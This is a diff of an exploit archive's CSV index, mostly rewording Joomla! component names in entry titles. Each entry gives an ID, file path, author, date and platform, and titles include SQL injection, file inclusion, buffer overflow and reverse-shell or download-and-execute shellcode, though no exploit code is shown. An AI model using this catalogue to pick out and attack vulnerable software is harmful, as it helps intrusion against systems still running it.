|
||||
12782,platforms/php/webapps/12782.txt,"Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
|
||||
12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0
|
||||
12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) - SQL Injection",2010-05-29,Shamus,windows,webapps,0
|
||||
12787,platforms/php/webapps/12787.txt,"Nucleus Plugin Gallery - Remote File Inclusion / SQL Injection",2010-05-29,AntiSecurity,php,webapps,0
|
||||
|
@ -11677,7 +11677,7 @@ id,file,description,date,author,platform,type,port
|
|||
12792,platforms/php/webapps/12792.txt,"MileHigh Creative - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
|
||||
12793,platforms/php/webapps/12793.txt,"Cosmos Solutions CMS - SQL Injection",2010-05-29,cyberlog,php,webapps,0
|
||||
12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS - (id= / page=) SQL Injection",2010-05-29,gendenk,php,webapps,0
|
||||
12796,platforms/php/webapps/12796.txt,"Joomla! Component BF Quiz - SQL Injection (2)",2010-05-29,"Valentin Hoebel",php,webapps,0
|
||||
12796,platforms/php/webapps/12796.txt,"Joomla! Component 'com_bfquiztrial' - SQL Injection (2)",2010-05-29,"Valentin Hoebel",php,webapps,0
|
||||
12797,platforms/php/webapps/12797.txt,"Webiz 2004 - Local File Upload",2010-05-29,kannibal615,php,webapps,0
|
||||
12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0
|
||||
12801,platforms/php/webapps/12801.txt,"osCommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,php,webapps,0
|
||||
|
@ -11689,9 +11689,9 @@ id,file,description,date,author,platform,type,port
|
|||
12808,platforms/php/webapps/12808.txt,"PTC Site's - Remote Code Execution / Cross-Site Scripting",2010-05-30,CrazyMember,php,webapps,0
|
||||
12809,platforms/php/webapps/12809.txt,"Symphony CMS - Local File Inclusion",2010-05-30,AntiSecurity,php,webapps,0
|
||||
12811,platforms/php/webapps/12811.txt,"osCommerce Online Merchant 2.2 - Arbitrary File Upload",2010-05-30,MasterGipy,php,webapps,0
|
||||
12812,platforms/php/webapps/12812.txt,"Joomla! Component com_quran - SQL Injection",2010-05-30,r3m1ck,php,webapps,0
|
||||
12812,platforms/php/webapps/12812.txt,"Joomla! Component 'com_quran' - SQL Injection",2010-05-30,r3m1ck,php,webapps,0
|
||||
12813,platforms/php/webapps/12813.txt,"WsCMS - Multiple SQL Injections",2010-05-31,cyberlog,php,webapps,0
|
||||
12814,platforms/php/webapps/12814.txt,"Joomla! Component com_g2bridge - Local File Inclusion",2010-05-31,akatsuchi,php,webapps,0
|
||||
12814,platforms/php/webapps/12814.txt,"Joomla! Component 'com_g2bridge' - Local File Inclusion",2010-05-31,akatsuchi,php,webapps,0
|
||||
12815,platforms/windows/remote/12815.txt,"GoAheaad WebServer - Source Code Disclosure",2010-05-30,Sil3nt_Dre4m,windows,remote,0
|
||||
12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,windows,dos,0
|
||||
12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - (Source Code Disclosure) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0
|
||||
|
@ -11699,15 +11699,15 @@ id,file,description,date,author,platform,type,port
|
|||
12819,platforms/php/webapps/12819.txt,"Persian E107 - Cross-Site Scripting",2010-05-31,indoushka,php,webapps,0
|
||||
12820,platforms/php/webapps/12820.txt,"Visitor Logger - 'banned.php' Remote File Inclusion",2010-05-31,bd0rk,php,webapps,0
|
||||
12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - SEH Exploit",2010-05-31,Stoke,windows,local,0
|
||||
12822,platforms/php/webapps/12822.txt,"Joomla! Component com_jsjobs - SQL Injection",2010-05-31,d0lc3,php,webapps,0
|
||||
12822,platforms/php/webapps/12822.txt,"Joomla! Component 'com_jsjobs' - SQL Injection",2010-05-31,d0lc3,php,webapps,0
|
||||
12823,platforms/php/webapps/12823.txt,"MusicBox - SQL Injection",2010-05-31,titanichacker,php,webapps,0
|
||||
12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) - SQL Injection",2010-05-31,"SA H4x0r",asp,webapps,0
|
||||
12834,platforms/windows/remote/12834.py,"XFTP 3.0 Build 0239 - Long Filename Buffer Overflow",2010-06-01,sinn3r,windows,remote,0
|
||||
12839,platforms/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,php,webapps,0
|
||||
12840,platforms/php/webapps/12840.txt,"Delivering Digital Media CMS - SQL Injection",2010-06-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
12841,platforms/asp/webapps/12841.txt,"Ticimax E-Ticaret - SQL Injection",2010-06-01,Neuromancer,asp,webapps,0
|
||||
12842,platforms/php/webapps/12842.txt,"Joomla! Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
|
||||
12843,platforms/php/webapps/12843.txt,"Joomla! Component ChronoForms (com_chronocontact) - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
|
||||
12842,platforms/php/webapps/12842.txt,"Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
|
||||
12843,platforms/php/webapps/12843.txt,"Joomla! Component 'com_chronocontact' - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
|
||||
12845,platforms/php/webapps/12845.txt,"Vastal I-Tech - SQL Injection",2010-06-02,HELLBOY,php,webapps,0
|
||||
12848,platforms/php/webapps/12848.txt,"SIMM Management System (SMS) - Local File Inclusion",2010-06-02,AntiSecurity,php,webapps,0
|
||||
12849,platforms/php/webapps/12849.txt,"slogan design Script - SQL Injection",2010-06-03,Mr.P3rfekT,php,webapps,0
|
||||
|
@ -11723,7 +11723,7 @@ id,file,description,date,author,platform,type,port
|
|||
12865,platforms/hardware/remote/12865.txt,"Motorola Surfboard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",hardware,remote,0
|
||||
12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,php,webapps,0
|
||||
12867,platforms/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,php,webapps,0
|
||||
12868,platforms/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,php,webapps,0
|
||||
12868,platforms/php/webapps/12868.txt,"Joomla! Component 'com_lead' - SQL Injection",2010-06-03,ByEge,php,webapps,0
|
||||
40335,platforms/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,windows,local,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -12107,7 +12107,7 @@ id,file,description,date,author,platform,type,port
|
|||
13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0
|
||||
13735,platforms/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080
|
||||
13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - (skin) Remote File Inclusion",2010-06-06,eidelweiss,php,webapps,0
|
||||
13737,platforms/php/webapps/13737.txt,"Joomla! Component com_djartgallery - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0
|
||||
13737,platforms/php/webapps/13737.txt,"Joomla! Component 'com_djartgallery' - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0
|
||||
13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps,0
|
||||
13739,platforms/php/webapps/13739.txt,"WmsCMS - Cross-Site Scripting / SQL Injection",2010-06-06,Ariko-Security,php,webapps,0
|
||||
13740,platforms/php/webapps/13740.txt,"iScripts eSwap 2.0 - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,php,webapps,0
|
||||
|
@ -12118,9 +12118,9 @@ id,file,description,date,author,platform,type,port
|
|||
15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow (SEH)",2010-11-12,Dr_IDE,windows,local,0
|
||||
13744,platforms/php/webapps/13744.txt,"RTRandomImage - Remote File Inclusion",2010-06-06,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
13745,platforms/php/webapps/13745.txt,"Sphider Script - Remote Code Execution",2010-06-06,XroGuE,php,webapps,0
|
||||
13746,platforms/php/webapps/13746.txt,"Joomla! Component com_searchlog - SQL Injection",2010-06-06,d0lc3,php,webapps,0
|
||||
13746,platforms/php/webapps/13746.txt,"Joomla! Component 'com_searchlog' - SQL Injection",2010-06-06,d0lc3,php,webapps,0
|
||||
13747,platforms/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0
|
||||
13748,platforms/php/webapps/13748.txt,"Joomla! Component com_annonces - Arbitrary File Upload",2010-06-06,Sid3^effects,php,webapps,0
|
||||
13748,platforms/php/webapps/13748.txt,"Joomla! Component 'com_annonces' - Arbitrary File Upload",2010-06-06,Sid3^effects,php,webapps,0
|
||||
13749,platforms/php/webapps/13749.txt,"idevspot Text ads 2.08 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0
|
||||
13750,platforms/php/webapps/13750.txt,"WebBiblio Subject Gateway System - Local File Inclusion",2010-06-06,AntiSecurity,php,webapps,0
|
||||
13751,platforms/php/webapps/13751.txt,"greeting card - Arbitrary File Upload",2010-06-06,Mr.Benladen,php,webapps,0
|
||||
|
@ -12158,21 +12158,21 @@ id,file,description,date,author,platform,type,port
|
|||
13790,platforms/asp/webapps/13790.txt,"iClone - SQL Injection",2010-06-09,Sid3^effects,asp,webapps,0
|
||||
14333,platforms/php/webapps/14333.html,"Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
|
||||
14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - netcat connect back port 8080 Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0
|
||||
13792,platforms/php/webapps/13792.txt,"Joomla! Component cinema - SQL Injection",2010-06-09,Sudden_death,php,webapps,0
|
||||
13792,platforms/php/webapps/13792.txt,"Joomla! Component 'com_cinema' - SQL Injection",2010-06-09,Sudden_death,php,webapps,0
|
||||
13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager - SQL Injection",2010-06-09,"L0rd CrusAd3r",asp,webapps,0
|
||||
13794,platforms/multiple/webapps/13794.txt,"Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,multiple,webapps,0
|
||||
13794,platforms/multiple/webapps/13794.txt,"Joomla! Component 'Jreservation' 1.5 - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,multiple,webapps,0
|
||||
27972,platforms/php/webapps/27972.txt,"ESTsoft InternetDisk - Arbitrary File Upload / Script Execution",2006-06-05,Kil13r,php,webapps,0
|
||||
27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 - inc/dbase.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
|
||||
27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 - inc/config.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
|
||||
13796,platforms/php/webapps/13796.txt,"Joomla! Component com_jstore - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13797,platforms/php/webapps/13797.txt,"Joomla! Component com_jtickets - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13798,platforms/php/webapps/13798.txt,"Joomla! Component com_jcommunity - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13799,platforms/php/webapps/13799.txt,"Joomla! Component com_jmarket - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13800,platforms/php/webapps/13800.txt,"Joomla! Component com_jsubscription - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13796,platforms/php/webapps/13796.txt,"Joomla! Component 'com_jstore' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13797,platforms/php/webapps/13797.txt,"Joomla! Component 'com_jtickets' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13798,platforms/php/webapps/13798.txt,"Joomla! Component 'com_jcommunity' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13799,platforms/php/webapps/13799.txt,"Joomla! Component 'com_jmarket' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13800,platforms/php/webapps/13800.txt,"Joomla! Component 'com_jsubscription' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13801,platforms/php/webapps/13801.txt,"Science Fair In A Box - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps,0
|
||||
13802,platforms/php/webapps/13802.txt,"PHP Real Estate Script - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0
|
||||
13803,platforms/php/webapps/13803.txt,"PHPAccess - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0
|
||||
13804,platforms/php/webapps/13804.txt,"Joomla! Component com_jnewsletter - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13804,platforms/php/webapps/13804.txt,"Joomla! Component 'com_jnewsletter' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13805,platforms/php/webapps/13805.txt,"PHP Property Rental Script - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps,0
|
||||
13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0
|
||||
13807,platforms/php/webapps/13807.py,"BtiTracker 1.3.x < 1.4.x - Exploit",2010-06-09,TinKode,php,webapps,0
|
||||
|
@ -12274,10 +12274,10 @@ id,file,description,date,author,platform,type,port
|
|||
13919,platforms/windows/dos/13919.c,"Corel VideoStudio Pro X3 - '.mp4' Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0
|
||||
13920,platforms/windows/dos/13920.c,"H264WebCam - Boundary Condition Error",2010-06-18,"fl0 fl0w",windows,dos,0
|
||||
13921,platforms/windows/dos/13921.c,"PowerZip 7.21 (Build 4010) - Stack Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0
|
||||
13922,platforms/php/webapps/13922.txt,"Joomla! Component com_joomdocs - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0
|
||||
13923,platforms/php/webapps/13923.txt,"Joomla! Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
13925,platforms/php/webapps/13925.txt,"Joomla! Component ozio Gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
13926,platforms/php/webapps/13926.txt,"Joomla! Component listbingo 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
13922,platforms/php/webapps/13922.txt,"Joomla! Component 'com_joomdocs' - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0
|
||||
13923,platforms/php/webapps/13923.txt,"Joomla! Component 'com_answers' 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
13925,platforms/php/webapps/13925.txt,"Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
13926,platforms/php/webapps/13926.txt,"Joomla! Component 'com_listbingo' 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
13927,platforms/php/webapps/13927.txt,"MarketSaz - Arbitrary File Upload",2010-06-18,NetQurd,php,webapps,0
|
||||
13929,platforms/php/webapps/13929.txt,"Banner Management Script - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
|
||||
13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
|
||||
|
@ -12285,7 +12285,7 @@ id,file,description,date,author,platform,type,port
|
|||
13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0
|
||||
13933,platforms/php/webapps/13933.txt,"UK One Media CMS - 'id' Error-Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0
|
||||
13934,platforms/windows/dos/13934.py,"MoreAmp - '.maf' Buffer Overflow (PoC)",2010-06-19,Sid3^effects,windows,dos,0
|
||||
13935,platforms/php/webapps/13935.txt,"Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,php,webapps,0
|
||||
13935,platforms/php/webapps/13935.txt,"Joomla! Component 'RSComments' 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,php,webapps,0
|
||||
13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection (ladder[id])",2010-06-19,ahwak2000,php,webapps,0
|
||||
13937,platforms/php/webapps/13937.txt,"SnowCade 3.0 - SQL Injection",2010-06-19,ahwak2000,php,webapps,0
|
||||
13938,platforms/php/webapps/13938.html,"WebsiteBaker 2.8.1 - Cross-Site Request Forgery (PoC)",2010-06-19,"Luis Santana",php,webapps,0
|
||||
|
@ -12300,11 +12300,11 @@ id,file,description,date,author,platform,type,port
|
|||
13947,platforms/php/webapps/13947.txt,"PHP Calendars Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0
|
||||
13948,platforms/php/webapps/13948.txt,"OroHYIP - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0
|
||||
13949,platforms/php/webapps/13949.txt,"Shareasale Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0
|
||||
13951,platforms/php/webapps/13951.txt,"Joomla! Component com_eportfolio - Arbitrary File Upload",2010-06-20,Sid3^effects,php,webapps,0
|
||||
13951,platforms/php/webapps/13951.txt,"Joomla! Component 'com_eportfolio' - Arbitrary File Upload",2010-06-20,Sid3^effects,php,webapps,0
|
||||
13952,platforms/php/webapps/13952.txt,"Saffa Tunes CMS - 'news.php' SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0
|
||||
13954,platforms/php/webapps/13954.txt,"G.CMS Generator - SQL Injection",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13955,platforms/php/webapps/13955.txt,"Joomla! Component Template BizWeb com_community - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13956,platforms/php/webapps/13956.txt,"Joomla! Component Hot Property com_jomestate - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13955,platforms/php/webapps/13955.txt,"Joomla! Component 'com_community' - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13956,platforms/php/webapps/13956.txt,"Joomla! Component 'com_jomestate' - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13957,platforms/php/webapps/13957.txt,"myUPB 2.2.6 - Multiple Vulnerabilities",2010-06-21,"ALTBTA ",php,webapps,0
|
||||
13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos,0
|
||||
13959,platforms/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987
|
||||
|
@ -12313,7 +12313,7 @@ id,file,description,date,author,platform,type,port
|
|||
14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0
|
||||
13960,platforms/php/webapps/13960.html,"PHPWCMS 1.4.5 r398 - Cross-Site Request Forgery",2010-06-21,"Jeremiah Talamantes",php,webapps,0
|
||||
13961,platforms/php/webapps/13961.txt,"Alpin CMS 1.0 - SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0
|
||||
13962,platforms/php/webapps/13962.txt,"Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting",2010-06-21,jdc,php,webapps,0
|
||||
13962,platforms/php/webapps/13962.txt,"Joomla! Component 'JomSocial' 1.6.288 - Multiple Cross-Site Scripting",2010-06-21,jdc,php,webapps,0
|
||||
13964,platforms/php/webapps/13964.txt,"Linker IMG 1.0 - Remote File Inclusion",2010-06-21,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - SEH (PoC)",2010-06-22,blake,windows,dos,0
|
||||
13966,platforms/php/webapps/13966.txt,"The Uploader 2.0.4 - Remote File Disclosure",2010-06-22,Xa7m3d,php,webapps,0
|
||||
|
@ -12326,9 +12326,9 @@ id,file,description,date,author,platform,type,port
|
|||
13976,platforms/php/webapps/13976.txt,"Top Sites Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
|
||||
13977,platforms/php/webapps/13977.txt,"Social Community Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
|
||||
13978,platforms/php/webapps/13978.txt,"Job Search Engine Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
|
||||
13979,platforms/php/webapps/13979.txt,"Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection",2010-06-22,v3n0m,php,webapps,0
|
||||
13979,platforms/php/webapps/13979.txt,"Joomla! Component 'com_ybggal' 1.0 - 'catid' Parameter SQL Injection",2010-06-22,v3n0m,php,webapps,0
|
||||
13980,platforms/php/webapps/13980.txt,"Cornerstone CMS - SQL Injection",2010-06-22,"Th3 RDX",php,webapps,0
|
||||
13981,platforms/php/webapps/13981.txt,"Joomla! Component Picasa2Gallery - Local File Inclusion",2010-06-22,kaMtiEz,php,webapps,0
|
||||
13981,platforms/php/webapps/13981.txt,"Joomla! Component 'com_picasa2gallery' - Local File Inclusion",2010-06-22,kaMtiEz,php,webapps,0
|
||||
13982,platforms/php/webapps/13982.txt,"Alpin CMS - 'e4700.asp?id' SQL Injection",2010-06-22,CoBRa_21,php,webapps,0
|
||||
13983,platforms/php/webapps/13983.txt,"Greeting card 1.1 - SQL Injection",2010-06-22,Net.Edit0r,php,webapps,0
|
||||
13986,platforms/php/webapps/13986.txt,"Softbiz Resource Repository Script - Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0
|
||||
|
@ -12341,7 +12341,7 @@ id,file,description,date,author,platform,type,port
|
|||
14512,platforms/php/webapps/14512.txt,"Concept E-Commerce - SQL Injection",2010-07-31,gendenk,php,webapps,0
|
||||
13995,platforms/asp/webapps/13995.txt,"Boat Classifieds - 'printdetail.asp?Id' SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0
|
||||
13996,platforms/php/webapps/13996.txt,"Pre Multiple Vendors Shopping Malls - 'products.php?sid' SQL Injection",2010-06-23,CoBRa_21,php,webapps,0
|
||||
13997,platforms/php/webapps/13997.txt,"Joomla! Component JE Ajax Event Calendar - SQL Injection",2010-06-23,"L0rd CrusAd3r",php,webapps,0
|
||||
13997,platforms/php/webapps/13997.txt,"Joomla! Component 'jeeventcalendar' - SQL Injection",2010-06-23,"L0rd CrusAd3r",php,webapps,0
|
||||
13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' SEH Universal Buffer Overflow",2010-06-23,Madjix,windows,local,0
|
||||
13999,platforms/php/webapps/13999.html,"Software Index - Arbitrary File Upload",2010-06-23,indoushka,php,webapps,0
|
||||
14000,platforms/php/webapps/14000.txt,"PishBini Footbal - Cross-Site Scripting / SQL Injection",2010-06-23,indoushka,php,webapps,0
|
||||
|
@ -12360,7 +12360,7 @@ id,file,description,date,author,platform,type,port
|
|||
14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0
|
||||
14015,platforms/php/webapps/14015.txt,"2DayBiz Photo Sharing Script - SQL Injection (1)",2010-06-24,JaMbA,php,webapps,0
|
||||
14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - 'init.php' Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0
|
||||
14017,platforms/php/webapps/14017.txt,"Joomla! Component com_realtyna - Local File Inclusion",2010-06-24,MISTERFRIBO,php,webapps,0
|
||||
14017,platforms/php/webapps/14017.txt,"Joomla! Component 'com_realtyna' - Local File Inclusion",2010-06-24,MISTERFRIBO,php,webapps,0
|
||||
14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
|
||||
14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
|
||||
14020,platforms/php/webapps/14020.txt,"2DayBiz The Web Template Software - SQL Injection / Cross-Site Scripting",2010-06-24,Sangteamtham,php,webapps,0
|
||||
|
@ -12384,19 +12384,19 @@ id,file,description,date,author,platform,type,port
|
|||
14051,platforms/php/webapps/14051.txt,"2DayBiz B2B Portal Script - 'selling_buy_leads1.php' SQL Injection",2010-06-25,r45c4l,php,webapps,0
|
||||
14052,platforms/windows/shellcode/14052.c,"Windows - WinExec cmd.exe + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,windows,shellcode,0
|
||||
14053,platforms/php/webapps/14053.txt,"snipe Gallery Script - SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0
|
||||
14054,platforms/php/webapps/14054.txt,"Joomla! Component JE Story Submit - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0
|
||||
14055,platforms/php/webapps/14055.txt,"Joomla! Component com_sef - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0
|
||||
14054,platforms/php/webapps/14054.txt,"Joomla! Component 'jesubmit' - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0
|
||||
14055,platforms/php/webapps/14055.txt,"Joomla! Component 'com_sef' - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0
|
||||
14056,platforms/php/webapps/14056.txt,"Clicker CMS - Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps,0
|
||||
14057,platforms/php/webapps/14057.txt,"WordPress Plugin Cimy Counter - Exploit",2010-06-26,sebug,php,webapps,0
|
||||
14058,platforms/aix/webapps/14058.html,"PHP-Nuke 8.2 - Arbitrary File Upload Exploit",2010-06-26,Net.Edit0r,aix,webapps,0
|
||||
14059,platforms/php/webapps/14059.txt,"Joomla! Component JE Awd Song - Persistent Cross-Site Scripting",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14060,platforms/php/webapps/14060.txt,"Joomla! Component JE Media Player - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14059,platforms/php/webapps/14059.txt,"Joomla! Component 'com_awd_song' - Persistent Cross-Site Scripting",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14060,platforms/php/webapps/14060.txt,"Joomla! Component 'JE Media Player' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14085,platforms/php/webapps/14085.txt,"iNet Online Community - Blind SQL Injection",2010-06-28,JaMbA,php,webapps,0
|
||||
14266,platforms/windows/dos/14266.pl,"IrcDelphi Daemon Server - Denial of Service",2010-07-08,Crash,windows,dos,6667
|
||||
14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 - 'buyupg.php' SQL Injection",2010-06-28,Dark.Man,php,webapps,0
|
||||
14062,platforms/php/webapps/14062.txt,"Joomla! Component JE Event Calendar - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14063,platforms/php/webapps/14063.txt,"Joomla! Component JE Job com_jejob - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14064,platforms/php/webapps/14064.txt,"Joomla! Component JE Section Finder - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14062,platforms/php/webapps/14062.txt,"Joomla! Component 'jeeventcalendar' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14063,platforms/php/webapps/14063.txt,"Joomla! Component 'com_jejob' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14064,platforms/php/webapps/14064.txt,"Joomla! Component 'jesectionfinder' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local Buffer Overflow (Windows 7 ASLR + DEP Bypass)",2010-06-26,Node,windows,local,0
|
||||
14073,platforms/php/webapps/14073.txt,"2DayBiz Matrimonial Script - smartresult.php SQL Injection",2010-06-27,"Easy Laster",php,webapps,0
|
||||
